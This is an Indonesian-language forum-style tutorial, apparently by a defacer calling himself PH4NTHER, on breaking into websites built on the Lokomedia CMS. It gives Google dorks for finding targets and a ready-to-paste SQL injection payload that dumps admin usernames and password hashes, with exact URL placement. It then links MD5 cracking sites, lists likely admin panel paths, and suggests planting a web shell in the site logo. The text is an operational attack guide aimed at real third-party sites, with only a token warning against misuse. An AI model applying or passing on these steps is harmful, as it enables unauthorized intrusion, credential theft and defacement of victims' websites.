Malem Gan
PH4NTHER ingin kasih tutorial cara deface dengan Menggunakan SQL LOKOMEDIA
Saya post ini tutor untuk kasih tau ke kalian cara deface dengan sql lokmed gan
Jangan di salah gunakan Tutor ini !!!
Yuk Langsung aja
Bahan :
1. Dork :
inurl:/statis-1-profil.html
inurl:/statis-2-profil.html
inurl:/statis-3-profil.html
inurl:/statis-3-stukturorganisasi.html
inurl:/kategori-23-hiburan.html
Kembangin lagi gan dorknya hehehe
2. Exploit
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
3. MD5 Decrypter
KHUSUS MD5 DECRYPTER, LU DECRYPT PAKE OTAK LU NDIRI!
Bercanda :v Ada tools online nya kok :p
https://hashkiller.co.uk/md5-decrypter.aspx
http://md5online.org/
========= TUTORIAL=========
1. Dorking pake dork di atas.
2. Pilih salah satu target. Salah dua juga gapapa :v
3. Masukan injeksi nya.
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
Gatau caranya? :v Sini gw ajarin :p
http://site.co.li/statis-1-profil.html lu tambahin exploit nya sesudah angka. Jadinya gini:
http://site.co.li/statis-1'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+-profil.html
Kalo VULN Pasti ada USER ADMIN dan angka / code mujarab wekwkeak :v
seperti : Admin 23723728
Klo ga keliatan bisa CTRL + U , CTRL + F Cari : admin
lalu copy MD5 / Code mujarabnya ke MD5 Decrypter
4. Tinggal cari admin page nya. Biasanya sih di:
http://target.co.li/admin
http://target.co.li/adminweb
http://target.co.li/administrator
http://target.co.li/redaktur
Klo ga ketemu bisa pake Login admin Online / admin finder online
Masih ga ketemu? Cari target lain :D
Tanem shell ? di logo biasanya
akses shell klik kanan aja gambarnya , lalu Copy url image
Nitip nick : PH4NTHER dan nitip Team : Cyrus Cyber
Via Video? : https://www.youtube.com/watch?v=0jpUxCEkkc4&t < Neh
Tutor Sampe sini dlu ya gan <3 Bye
